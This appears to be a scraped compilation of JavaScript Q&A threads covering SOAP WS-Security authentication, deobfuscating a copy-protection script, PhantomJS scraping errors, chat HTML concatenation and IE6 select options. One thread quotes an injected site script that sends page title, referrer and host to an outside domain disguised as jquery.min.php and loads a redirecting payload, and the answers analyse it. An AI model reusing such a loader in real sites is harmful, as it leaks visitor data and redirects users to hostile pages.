Probleme Authentification with nodejs and soap - javascript

I consume a SOAP who use a PasswordDigest authentification.
I use with succes this library: https://github.com/vpulim/node-soap
I run this code on Debian with nodejs version v0.10.29 and it's work.
Now i need to make it run on a windows computer with nodejs v6.6.0, and its not working anymore.
I have the following messages:
The security token could not be authenticated or authorized
I suspect a problem with the crypto lib, this code maybe:
"use strict";
var crypto = require('crypto');
exports.passwordDigest = function passwordDigest(nonce, created, password) {
// digest = base64 ( sha1 ( nonce + created + password ) )
var pwHash = crypto.createHash('sha1');
var rawNonce = new Buffer(nonce || '', 'base64').toString('binary');
pwHash.update(rawNonce + created + password);
return pwHash.digest('base64');
};
From https://github.com/vpulim/node-soap/blob/master/lib/utils.js


Ok, so here's the way I've worked around it:
The SOAP library has a function for building the WSSE security header, which is placed in soap/lib/security/templates/WSSecurity.js.
The problem for me that the UsernameToken it was placing in the header was inconsistent with the one that soapUI was using and actually getting results (in my example).
Orignal code:
"<wsse:UsernameToken xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\" wsu:Id=\"SecurityToken-" + created + "\">
While what I needed was:
<wsse:UsernameToken wsu:Id="UsernameToken-<token>">
To get the proper token I've used WSSE library from npm (https://www.npmjs.com/package/wsse).
All I had to do was include the package, define the token as in the readme:
const wsse = require('wsse');
const token = wsse({ username: '<username>', password: '<password>' })
Then call token.getNonce() for the proper token and token.getPasswordDigest() for the EncodingType property in the header.
After that everything works as intended.
Hope that helps!


I have pushed module using #MTM answer.
Please have a look
https://www.npmjs.com/package/wssecurity-soap
Code for fixing it, in case anyone wants to review (its same as soap wssecurity auth implementation including fix)
var crypto = require('crypto');
var wsse = require('wsse');
var validPasswordTypes = ['PasswordDigest', 'PasswordText'];
function WSSecurity(username, password, options) {
options = options || {};
this._username = username;
this._password = password;
if (typeof options === 'string') {
this._passwordType = options ?
options :
'PasswordText';
options = {};
} else {
this._passwordType = options.passwordType ?
options.passwordType :
'PasswordText';
}
if (validPasswordTypes.indexOf(this._passwordType) === -1) {
this._passwordType = 'PasswordText';
}
this._hasTimeStamp = options.hasTimeStamp || typeof options.hasTimeStamp === 'boolean' ? !!options.hasTimeStamp : true;
if (options.hasNonce != null) {
this._hasNonce = !!options.hasNonce;
}
this._hasTokenCreated = options.hasTokenCreated || typeof options.hasTokenCreated === 'boolean' ? !!options.hasTokenCreated : true;
if (options.actor != null) {
this._actor = options.actor;
}
if (options.mustUnderstand != null) {
this._mustUnderstand = !!options.mustUnderstand;
}
}
WSSecurity.prototype.toXML = function() {
this._token = wsse({
username: this._username,
password: this._password
})
function getDate(d) {
function pad(n) {
return n < 10 ? '0' + n : n;
}
return d.getUTCFullYear() + '-'
+ pad(d.getUTCMonth() + 1) + '-'
+ pad(d.getUTCDate()) + 'T'
+ pad(d.getUTCHours()) + ':'
+ pad(d.getUTCMinutes()) + ':'
+ pad(d.getUTCSeconds()) + 'Z';
}
var now = new Date(this._token.getCreated());
var created = this._token.getCreated() ;
var timeStampXml = '';
if (this._hasTimeStamp) {
var expires = getDate( new Date(now.getTime() + (1000 * 600)) );
timeStampXml = "<wsu:Timestamp wsu:Id=\"Timestamp-"+created+"\">" +
"<wsu:Created>"+created+"</wsu:Created>" +
"<wsu:Expires>"+expires+"</wsu:Expires>" +
"</wsu:Timestamp>";
}
var password, nonce;
if (this._hasNonce || this._passwordType !== 'PasswordText') {
var nHash = crypto.createHash('sha1');
nHash.update(created + Math.random());
nonce = nHash.digest('base64');
}
if (this._passwordType === 'PasswordText') {
password = "<wsse:Password Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText\">" + this._password + "</wsse:Password>";
if (nonce) {
password += "<wsse:Nonce EncodingType=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary\">" + nonce + "</wsse:Nonce>";
}
} else {
password = "<wsse:Password Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest\">" + this._token.getPasswordDigest() + "</wsse:Password>" +
"<wsse:Nonce EncodingType=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary\">" + this._token.getNonceBase64() + "</wsse:Nonce>";
}
return "<wsse:Security " + (this._actor ? "soap:actor=\"" + this._actor + "\" " : "") +
(this._mustUnderstand ? "soap:mustUnderstand=\"1\" " : "") +
"xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\">" +
timeStampXml +
"<wsse:UsernameToken wsu:Id=\"UsernameToken-" + created +"\">"+
"<wsse:Username>" + this._username + "</wsse:Username>" +
password +
(this._hasTokenCreated ? "<wsu:Created>" + created + "</wsu:Created>" : "") +
"</wsse:UsernameToken>" +
"</wsse:Security>";
};
module.exports = WSSecurity;

Related

How to decode Javascript _0x Hex

I tried to decode this code but I did not succeed:
var _0x147bb5 = _0xe0c4, _0x41852d = _0xe0c4, _0x39ac2c = _0xe0c4;
(function (_0x3c89e2, _0x4b3ebe) {
var _0x331330 = _0xe0c4, _0x279707 = _0xe0c4, _0x50917c = _0xe0c4, _0x489044 = _0x3c89e2();
while (!![]) {
try {
var _0x36e386 = -parseInt(_0x331330(0x133)) / 0x1 + -parseInt(_0x279707('0x12a')) / 0x2 + -parseInt(_0x331330(0x111)) / 0x3 + -parseInt(_0x331330(0x12f)) / 0x4 + parseInt(_0x279707('0x10a')) / 0x5 * (-parseInt(_0x279707('0xf1')) / 0x6) + -parseInt(_0x331330('0x109')) / 0x7 + parseInt(_0x331330(0xee)) / 0x8 * (parseInt(_0x279707(0x11a)) / 0x9);
if (_0x36e386 === _0x4b3ebe) break; else _0x489044['push'](_0x489044['shift']());
} catch (_0x108487) {
_0x489044['push'](_0x489044['shift']());
}
}
}(_0x5a9e, 0x7f5a2));
var s = _0x147bb5('0x12b') + _0x147bb5(0xdc) + _0x39ac2c('0x118') + '91', f = 0xb, l = lf(), message = _0x39ac2c('0x117') + _0x39ac2c('0xe7') + _0x39ac2c('0x108') + _0x147bb5('0xd4') + 'ot\x20' + _0x147bb5('0x104') + _0x41852d(0xd3) + _0x39ac2c('0x122') + _0x39ac2c('0xef') + _0x41852d(0x127) + _0x41852d('0x102') + _0x41852d('0xfb') + _0x147bb5(0xe2) + _0x39ac2c(0xf2) + _0x147bb5(0xe5) + _0x41852d(0xd6) + _0x39ac2c(0x125) + _0x41852d(0xff) + _0x147bb5(0xd7) + _0x41852d('0x110') + _0x39ac2c('0x11e') + _0x39ac2c(0xdd) + _0x41852d(0x107) + 'ea)';
function rtclickcheck(_0xf37bcd) {
var _0x5b07b6 = _0x39ac2c, _0x189d42 = _0x41852d, _0x158d5e = _0x147bb5;
if (navigator[_0x5b07b6(0xfd) + _0x189d42(0xf5) + 'e'] == _0x158d5e('0xe4') + _0x189d42(0xde) + 'pe' && _0xf37bcd[_0x5b07b6('0xfc') + 'ch'] == 0x3) return alert(message), ![];
if (navigator[_0x5b07b6(0xfd) + _0x189d42(0xf8) + _0x5b07b6('0x11d') + 'n'][_0x5b07b6('0xec') + _0x158d5e(0x128) + 'f'](_0x158d5e(0xe6) + 'E') != -0x1 && event[_0x189d42('0x126') + _0x158d5e('0x132')] == 0x2) return alert(message), ![];
} function _0x5a9e() {
var _0x521b96 = ['Thi', '7109872DszjuD', '4405xemFJj', 'deA', '//r', 'cre', 'hre', 'h=/', 're.', '1823784ZeLCWd', ';\x20p', 'etc', 'cap', 'cha', 'crt', 'Ooh', '794', 'TCS', '14494869UZdEDp', 'onm', 'erH', 'sio', 'com', 'ute', 'dli', 'men', 'py\x20', '_y=', 'tBy', 'uth', 'but', 'rot', 'exO', 'inn', '603236FmaGTN', '-11', 'exp', 'ous', 'toU', '2882436fEtPRL', 'dit', 'kie', 'ton', '1000745kgQiEE', '\x20Co', 's\x20N', 'hos', '//y', 'sto', 'len', 'pat', 'tri', '.ly', '350', '\x20(y', 'sca', 'gth', 'lin', 'rib', 'by\x20', 'Att', 'Net', 'ps:', 'MSI', '!!\x20', 'edo', 'ide', 'tna', '10;', 'ind', '/yu', '24DoydZk', '-\x20P', 'rCo', '4518TXMdnf', 'htt', 'N_f', 'Ele', 'Nam', 'and', 'get', 'Ver', 'ire', 'ati', 'ed\x20', 'whi', 'app', 'coo', 'eme', 'TML', 'ath', 'ect', 'sli', 'For', 'Tim', 'set', 'uid'];
_0x5a9e = function () {
return _0x521b96;
};
return _0x5a9e();
}
document[_0x147bb5(0x11b) + _0x147bb5('0x12d') + _0x147bb5('0xe8') + 'wn'] = rtclickcheck;
if (l == s && s[_0x147bb5(0xd8) + _0x147bb5('0xdf')] == f) {
var ceditf = document[_0x147bb5(0xf7) + _0x41852d(0xf4) + _0x39ac2c('0x121') + _0x147bb5(0x124) + 'Id'](_0x39ac2c(0x10d) + _0x147bb5('0x130') + _0x147bb5('0xe0') + 'k'), citf = document[_0x39ac2c(0xf7) + _0x147bb5('0xf4') + _0x39ac2c('0x121') + _0x39ac2c('0x124') + 'Id'](_0x39ac2c('0x116') + _0x39ac2c(0xe0) + 'k');
o();
var citdf = document[_0x41852d('0xf7') + _0x147bb5('0xf4') + _0x41852d(0x121) + _0x41852d('0x124') + 'Id'](_0x41852d('0x116') + _0x147bb5('0x120') + 'nk');
function checkLIC() {
var _0x4072d7 = _0x41852d, _0x264ab4 = _0x41852d, _0x1a0d97 = _0x147bb5;
if (cedit['inn' + _0x4072d7('0x11c') + _0x4072d7(0x100)][_0x1a0d97('0xd8') + _0x4072d7('0xdf')] === 0x0) return invalidLIC(), ![];
}
}
var cedit = document[_0x41852d(0xf7) + _0x39ac2c(0xf4) + _0x39ac2c(0x121) + _0x41852d('0x124') + 'Id'](_0x147bb5('0x10d') + _0x39ac2c(0x130) + _0x39ac2c(0xe0) + 'k');
function _0xe0c4(_0x488be0, _0x324154) {
var _0x5a9e88 = _0x5a9e();
return _0xe0c4 = function (_0xe0c4a8, _0x3812b4) {
_0xe0c4a8 = _0xe0c4a8 - 0xd3; var _0x1108f7 = _0x5a9e88[_0xe0c4a8];
return _0x1108f7;
}, _0xe0c4(_0x488be0, _0x324154);
}
!cedit && invalidLIC();
function o() {
_0x162858();
function _0x162858() {
var _0x139ac8 = _0xe0c4, _0x75417f = _0xe0c4, _0x15d340 = _0xe0c4, _0x5960f5 = new Date();
_0x5960f5[_0x139ac8(0x106) + _0x75417f('0x105') + 'e'](_0x5960f5[_0x75417f(0xf7) + _0x15d340(0x105) + 'e']() + 0x15180 * 0x3);
var _0x43eec0 = _0x75417f(0x12c) + _0x15d340(0xf9) + 's=' + _0x5960f5[_0x15d340('0x12e') + _0x139ac8(0x119) + _0x139ac8(0xda) + 'ng']();
document[_0x15d340('0xfe') + 'kie'] = _0x15d340(0x114) + _0x139ac8('0x123') + _0x15d340('0xeb') + _0x15d340('0xd9') + _0x75417f('0x10f') + ';', document[_0x75417f(0xfe) + _0x15d340('0x131')] = 'JSO' + _0x139ac8(0xf3) + _0x75417f('0x113') + 'h' + '=' + fetchon + ';' + _0x43eec0 + (_0x139ac8(0x112) + _0x15d340('0x101') + '=/'), window['loc' + _0x15d340(0xfa) + 'on'][_0x15d340('0x10e') + 'f'] = api;
}
}
function invalidLIC() { }
function checkLIC() {
var _0x4dac69 = _0x39ac2c, _0x55bc12 = _0x41852d, _0x4c895a = _0x147bb5;
if (cedit[_0x4dac69(0x129) + _0x4dac69('0x11c') + _0x4c895a(0x100)][_0x55bc12('0xd8') + _0x4dac69(0xdf)] === 0x0) return invalidLIC(), ![]; else {
if (cedit[_0x4c895a('0xf7') + _0x55bc12(0xe3) + _0x55bc12(0xe1) + _0x4c895a('0x11f')](_0x4dac69(0x10e) + 'f') !== _0x4c895a(0xf2) + _0x4c895a('0xe5') + _0x55bc12('0x10c') + 'ebr' + _0x4c895a('0xf6') + _0x4c895a(0xdb) + _0x55bc12('0xed') + _0x4c895a(0xe9) + 'a/') return invalidLIC(), ![];
}
}
checkLIC(),
setInterval(
function () {
checkLIC();
},
0x1388
);
function lf() {
var _0x5a8bac = _0x39ac2c, _0x505e9a = _0x147bb5, _0xd36b1d = _0x147bb5, _0x5b07b5 = location[_0x5a8bac(0xd5) + _0x505e9a('0xea') + 'me'][_0x5a8bac(0x103) + 'ce'](0x2)[_0x505e9a(0x103) + 'ce'](0x0, -0x2) + '24', _0x130606 = 0x0;
if (_0x5b07b5[_0x5a8bac('0xd8') + _0xd36b1d('0xdf')] == 0x0) return _0x130606;
for (i = 0x0; i < _0x5b07b5[_0x5a8bac('0xd8') + _0xd36b1d(0xdf)]; i++) {
char = _0x5b07b5[_0xd36b1d('0x115') + _0xd36b1d('0xf0') + _0xd36b1d(0x10b) + 't'](i), _0x130606 = (_0x130606 << 0x5) - _0x130606 + char, _0x130606 = _0x130606 & _0x130606;
}
return _0x130606;
}
https://jsfiddle.net/utpgLw06/
So My first approach is to use online tools, but none of them works. I also try to manually decode it by calling the function name console.log(_0x331330(0x133)) but it just shows strings that I don't understand. I also tried to decode those strings by using much hex at numerical decoders but none of them works. Anyone can help me, please?

I played a bit with this code:
The _Ox names are just variable names. You can make the code more readable by collecting all such distinct names and replace them with more readable names, like v1, v2, v3, ....
There are two variables referenced which are not defined, api and fetchon. I suppose that the page where this script runs, has defined them somewhere.
The first part of the script is harmless and just shuffles an array of strings, which is later used to obfuscate strings (often property names). You can execute it
The code that needs de-obfuscation is the code that gets/sets properties of window, document, nagivator, ...and other objects. You can get a long way by putting that part of the script in a template literal, and evaluating all those expressions that evaluate to a property name, or to a value assigned to a property.
Functions and immediate code are mixed. It helps to reorganise that a bit.
Some functions have local variables which are constants and have unique names. These can be moved to the global scope and can often be evaluated safely, so the rest of the function's code can be clarified inside a template literal (like explained above).
Any remaining variables (not evaluated), can be given more telling names by seeing how they are used.
Anyway, here is the result I got to:
function rtclickcheck(e) {
if (navigator.appName == "Netscape" && e.which == 3)
return alert("Ooh!! This Not For Copy - Protected by https://yuthemestore.com (yuidea)"), false;
if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2)
return alert("Ooh!! This Not For Copy - Protected by https://yuthemestore.com (yuidea)"), false;
}
document.onmousedown = rtclickcheck;
function o() {
var date = new Date();
date.setTime(date.getTime() + 259200);
var expiration = "expires=" + date.toUTCString();
document.cookie = "cap_y=10;path=/;";
// fetchon and api must be defined?
document.cookie = "JSON_fetch=" + fetchon + ";" + expiration + "; path=/";
window.location.href = api;
}
function invalidLIC() { }
function checkLIC() {
if (cedit.innerHTML.length === 0)
return invalidLIC(), false;
else {
if (cedit.getAttribute("href") !== "https://rebrand.ly/yuidea/")
return invalidLIC(), false;
}
}
function lf() {
var decrypted = location.hostname.slice(2).slice(0, -2) + '24',
encrypted = 0;
if (decrypted.length == 0) return encrypted;
for (i = 0; i < decrypted.length; i++) {
char = decrypted.charCodeAt(i);
encrypted = (encrypted << 5) - encrypted + char;
encrypted = encrypted & encrypted;
}
return encrypted;
}
var l = lf();
var s = "-1135079491";
if (l == s && s.length == 11) {
var ceditf = document.getElementById("creditlink"),
citf = document.getElementById("crtlink");
o();
var citdf = document.getElementById("crtdlink");
function checkLIC() {
if (cedit.innerHTML.length === 0)
return invalidLIC(), false;
}
}
var cedit = document.getElementById("creditlink");
!cedit && invalidLIC();
checkLIC();
setInterval(checkLIC, 5000);
This code seems to do the following things:
Avoid that the user can view the source of the page with a right click
Obfuscates the current site's hostname through bitshifting and summing, and checks that the result has a certain value. I didn't try to find out what the original hostname would have to be to get a match.
Sets some variables like ceditf which are not used in this script, but maybe elsewhere
If the host matches, two cookies are set, and a navigation occurs (to whatever api has as URL)
Every 5 seconds checks the content of the element with id "creditlink".
If the contents of "creditlink" are not as expected it calls invalidLIC, but that function is empty -- I think that might have had code in a previous version of this script, but it was later removed.

PhantomJS: TypeError: null is not an object(evaluating 'document.getElementById'())

One day ago I started messin' with phantomjs and their ability to read javascript generated data from the websites.[web scraping]
I'm trying to get element's text content by ID, but sometimes the particular website I try to crawl through doesn't have it, so then I get this error:
ERROR: TypeError: null is not an object (evaluating 'document.getElementById('resInfo-0').textContent')
TRACE:
-> undefined: 2
-> : 5
Screenshot from the Command Prompt:
My code so far:
1 step: reading the data from the file.
var file = "path to text file";
var fs = require('fs');
var stream = fs.open(file, 'r');
var urls = new Array();
var index = 0;
console.log("READING A FILE...");
while(!stream.atEnd()) {
var line = stream.readLine();
urls[index] = line;
index++;
}
console.log("FINISHED READING THE FILE");
index = 0;
2 step: Reading the data from the websites.
function web_page()
{
webPage = require('webpage');
page = webPage.create();
page.onError = function(msg, trace)
{
var msgStack = ['ERROR: ' + msg];
if (trace && trace.length) {
msgStack.push('TRACE:');
trace.forEach(function(t) {
msgStack.push(' -> ' + t.file + ': ' + t.line + (t.function ? ' (in
function "' + t.function +'")' : ''));
});
}
console.log(msgStack.join('\n') + " URL: " + urls[index]);
phantom.exit(0);
};
phantom.onError = function(msg, trace)
{
var msgStack = ['PHANTOM ERROR: ' + msg];
if (trace && trace.length) {
msgStack.push('TRACE:');
trace.forEach(function(t) {
msgStack.push(' -> ' + (t.file || t.sourceURL) + ': ' + t.line +
(t.function ? ' (in function ' + t.function +')' : ''));
});
}
console.log(msgStack.join('\n')+ " URL: " + urls[index]);
phantom.exit(0);
};
page.open('http://www.delfi.lt/paieska/?q='+urls[index], function(status)
{
if (status !== 'success')
{
console.log('Unable to access network');
}
else
{
var fs = require('fs');
var path = 'output.txt';
var content = page.content;
var ua = page.evaluate(function()
{
var x = document.getElementById('resInfo-0').textContent;
return x;
});
if ( ua != null && ua != "" )
{
var indexas = ua.indexOf("(");
ua = ua.substr(0,indexas);
ua = ua.replace(/\D/g,'');
fs.write(path,urls[index] + " - "+ ua + "\r\n", 'a+');
}
}
});
setTimeout(next,1000);
}
console.log("STARTING TO CRAW WEBSITES...");
web_page();
function next()
{
if ( index + 1 <= 288103 )
{
page.close();
index++;
web_page();
}
else if ( index + 1 > 288103 )
{
console.log("FINISHED CRAWLING PROCESS");
phantom.exit(0);
}
}
var ua = page.evaluate(function()
{
var x = document.getElementById('resInfo-0').textContent;
return x;
});
The error comes from here probably:
var ua = page.evaluate(function()
{
var x = document.getElementById('resInfo-0').textContent;
return x;
});
What I've tried:
if ( document.getElementById('resInfo-0').textContent != null )
if ( document.getElementById('resInfo-0').textContent != "" )
So why can't it become null without triggering this error?
PhantomJS version is 2.1.1 binary windows package.

Sometimes document.getElementById('resInfo-0') is null, but you're still trying to get .textContent of it, hence the error. Try
var elem = document.getElementById('resInfo-0');
if(elem !== null) {
return elem.textContent;
}
return false;

Concatenation javascript error -probably simple to fix

I'm trying to do the next thing:
getChatListMessageString: function(dateObject, userID, userName, userRole, messageID, messageText, channelID, ip) {
var rowClass = this.DOMbufferRowClass,
userClass = this.getRoleClass(userRole),
colon = ': ';
if(messageText.indexOf('/action') === 0 || messageText.indexOf('/me') === 0 || messageText.indexOf('/privaction') === 0) {
userClass += ' action';
colon = ' ';
}
if (messageText.indexOf('/privmsg') === 0 || messageText.indexOf('/privmsgto') === 0 || messageText.indexOf('/privaction') === 0) {
rowClass += ' private';
}
var dateTime = this.settings['dateFormat'] ? '<span class="dateTime">'
+ this.formatDate(this.settings['dateFormat'], dateObject) + '</span> ' : '';
return '<div id="'
+ this.getMessageDocumentID(messageID)
+ '" class="'
+ rowClass
+ '">'
+ this.getDeletionLink(messageID, userID, userRole, channelID)
+ dateTime
//start of the code i added
+ '<a href="http://hostname.x/report_chat.php?usernameR='
+ userName
+ '/&useridR='
+ userID
+ '">'
+ '<img src="img/excl.png"></img></a>'
// end of the code i added
+ '<a href="http://www.hostname.x/'
+ userID
+ '" target="_blank"'
+ this.getChatListUserNameTitle(userID, userName, userRole, ip)
+ ' dir="'
+ this.baseDirection
+ '" onclick="ajaxChat.insertText(this.firstChild.nodeValue);">'
+ userName
+ '</a>'
+ colon
+ this.replaceText(messageText)
+ '</div>';
},
If I remove the portion that I added , the page works just fine. When I add it back , I get an Aw Snap error(cache reloaded -> incognito mode )
I'm pretty new with javascript so I can't really tell what I did wrong.
Thank you!
EDIT: THE AW SNAP ERROR comes from the <img> tag for whatever reason.

//Here a simple test
var Obj = (function(){
return{
DOMbufferRowClass : 'DOMbufferRowClass',
getRoleClass : function()
{
return 'roleClass';
},
settings : '',
getMessageDocumentID : function(){
return '123';
},
getDeletionLink : function(messageID, userID, userRole, channelID)
{
return 'DeletiongLink'
},
replaceText : function()
{
},
getChatListMessageString : function(dateObject, userID, userName, userRole, messageID, messageText, channelID, ip) {
var rowClass = this.DOMbufferRowClass,
userClass = this.getRoleClass(userRole),
colon = ': ';
if(messageText.indexOf('/action') === 0 || messageText.indexOf('/me') === 0 || messageText.indexOf('/privaction') === 0) {
userClass += ' action';
colon = ' ';
}
if (messageText.indexOf('/privmsg') === 0 || messageText.indexOf('/privmsgto') === 0 || messageText.indexOf('/privaction') === 0) {
rowClass += ' private';
}
var dateTime = this.settings['dateFormat'] ? '<span class="dateTime">'
+ this.formatDate(this.settings['dateFormat'], dateObject) + '</span> ' : '';
return `<div id="${this.getMessageDocumentID(messageID)}" class="${rowClass}">
${this.getDeletionLink(messageID, userID, userRole, channelID)} ${dateTime}
<a href="http://hostname.x/report_chat.php?usernameR='${userName}/&useridR=${userID}">
<img src="img/excl.png"/></a><a href="http://www.hostname.x/${userID} target="_blank"
this.getChatListUserNameTitle(userID, userName, userRole, ip) dir="{this.baseDirection}
onclick="ajaxChat.insertText(this.firstChild.nodeValue);">${userName}</a>${colon}${this.replaceText(messageText)}</div>`;
}
};
})();
console.log(Obj.getChatListMessageString("05102017", '1234',"admin", '456', 'Test','11', '127.0.0.1'));
I would simplify your code with template literals and avoiding all the concatenation mess.
getChatListMessageString : function(dateObject, userID, userName, userRole, messageID, messageText, channelID, ip) {
var rowClass = this.DOMbufferRowClass,
userClass = this.getRoleClass(userRole),
colon = ': ';
if(messageText.indexOf('/action') === 0 || messageText.indexOf('/me') === 0 || messageText.indexOf('/privaction') === 0) {
userClass += ' action';
colon = ' ';
}
if (messageText.indexOf('/privmsg') === 0 || messageText.indexOf('/privmsgto') === 0 || messageText.indexOf('/privaction') === 0) {
rowClass += ' private';
}
var dateTime = this.settings['dateFormat'] ? '<span class="dateTime">'
+ this.formatDate(this.settings['dateFormat'], dateObject) + '</span> ' : '';
return `<div id="${this.getMessageDocumentID(messageID)}" class="${rowClass}">
${this.getDeletionLink(messageID, userID, userRole, channelID)} ${dateTime}
<a href="http://hostname.x/report_chat.php?usernameR='${userName}/&useridR=${userID}">
<img src="img/excl.png"/></a><a href="http://www.hostname.x/${userID} target="_blank"
this.getChatListUserNameTitle(userID, userName, userRole, ip) dir="{this.baseDirection}
onclick="ajaxChat.insertText(this.firstChild.nodeValue);">${userName}</a>${colon}${this.replaceText(messageText)}</div>`;
}

Ouch! The best approach is not to build your HTML elements in this manner in the first place and use the DOM to construct and inject them into your document.
This makes the code MUCH easier to read and modify and removes the concatenation issue entirely.
Now, if you have errors, you can focus on the values your are assigning to the properties and not the syntax of the HTML.
// Create the div element in memeory
var div = document.createElement("div");
// Configure the attributes of that div
div.id = this.getMessageDocumentID(messageID);
div.classList.add(rowClass);
// Now, begin populating the div
div.innerHTML = this.getDeletionLink(messageID, userID, userRole, channelID) + dateTime;
// A new element belongs inside the div. Repeat the process:
var a1 = document.createElement(a);
a1.href = "http://hostname.x/report_chat.php?usernameR=" + userName + "/&useridR=" + userID;
var img = document.createElement("img");
img.src = "img/excl.png";
// Place the image into the anchor
a1.appendChild(img);
// Place the anchor into the div
div.appendChild(a1);
// Another anchor is now needed
var a2 = document.createElement(a);
a2.href = "http://www.hostname.x/" + userID;
a2.target = "_blank";
// It is unclear what the following line is based on the fact that whatever it returns, you have that
// being inserted where attributes go. It is commented here for that reason.
//this.getChatListUserNameTitle(userID, userName, userRole, ip) + " dir='" + this.baseDirection;
// Set up event handler for the anchor
a2.addEventListener("click", function(){
ajaxChat.insertText(this.firstChild.nodeValue);
});
// Populate the anchor
a2.innerHTML = userName;
// Insert this anchor into the div
div.appendChild(a2);
// Insert the final contents into the div
div.innerHTML += colon + this.replaceText(messageText);
// Return the final construct
return div;

What is this javascript code doing

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
It was on my site (joomla theme),
I suspect to this code!

It will load a script from the following website:
http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=snt2014&c_utm=http%3A%2F%2Fwww.vermessung-stuetz.de%2Fjs%2Fjquery.min.php%3Fdefault_keyword%3D[WEBSITE TITLE]%26se_referrer%3D[DOMAIN OF YOUR WEBSITE]%26source%3D[REFFERER]
If I would execute that code NOW, the url would be:
http://www.vermessung-stuetz.de/js/jquery.min.php?c_utt=snt2014&c_utm=http%3A%2F%2Fwww.vermessung-stuetz.de%2Fjs%2Fjquery.min.php%3Fdefault_keyword%3Djoomla%2520-%2520What%2520is%2520this%2520javascript%2520code%2520doing%2520-%2520Stack%2520Overflow%26se_referrer%3Dhttp%253A%252F%252Fstackoverflow.com%252Fquestions%252Ftagged%252Fjavascript%26source%3Dstackoverflow.com
That script will redirect user to a site, but it seems to ban you if you visit it two times. I visited the url I was redirected to and I only saw a Google Chrome survey. Then I tried using a proxy and one of the things you might get is:
window.location.href='/HH4t0?sid1=mix_keywords';
The fact of it hidding in a jquery.min file makes me belive it's not something wanted.

It creates a script tag which makes a get request on the http://www.vermessung-stuetz.de/js/jquery.min.php" site.
Prettyfied code:
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://www.vermessung-stuetz.de/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}

Add <option> in IE 6 unwards

I've the code below written in JavaScript to add a new option to the select list from the opener window:
function updateSelectList()
{
var field = opener.document.objectdata.ticketPersonId;
if (true && opener && field)
{
var val = document.createElement('option');
var title = document.objectdata.titleId.options[document.objectdata.titleId.selectedIndex].text;
val.text = title + ' ' + document.objectdata.firstName.value + ' ' + document.objectdata.lastName.value + ':' + document.objectdata.username.value;
val.value = null;
val.selected = true;
field.add(val, null);
}
}
works all fine in Firefox, Google Chrome etc but not IE 6 :-(
please advise how I can make this work in IE 6 aswell.

Here's my snippet:
if (oldopt!=null || !horus.brokenDOM)
select.add(newopt, oldopt);
else
newopt=options[options.length]=new Option(newopt.text, newopt.value, false, false);
The definition of horus.brokenDOM is left to the reader :)
IIRC, I had some difficulty with using pre-defined Option objects (generally pulled out of another selectbox) in this context with IE, hence the in-place object creation.

function updateSelectList()
{
var field = opener.<%= updatelist %>;
if (<%= called %> && opener && field)
{
var val = opener.document.createElement('option');
var title = document.objectdata.titleId.options[document.objectdata.titleId.selectedIndex].text;
val.text = title + ' ' + document.objectdata.firstName.value + ' ' + document.objectdata.lastName.value + ':' + document.objectdata.username.value;
val.value = <%= thePerson != null ? thePerson.getId() : null %>;
val.selected = true;
try
{
field.add(val, null);
}
catch(error)
{
field.add(val, 0);
}
}
}
this seams to work. What a mission!

Categories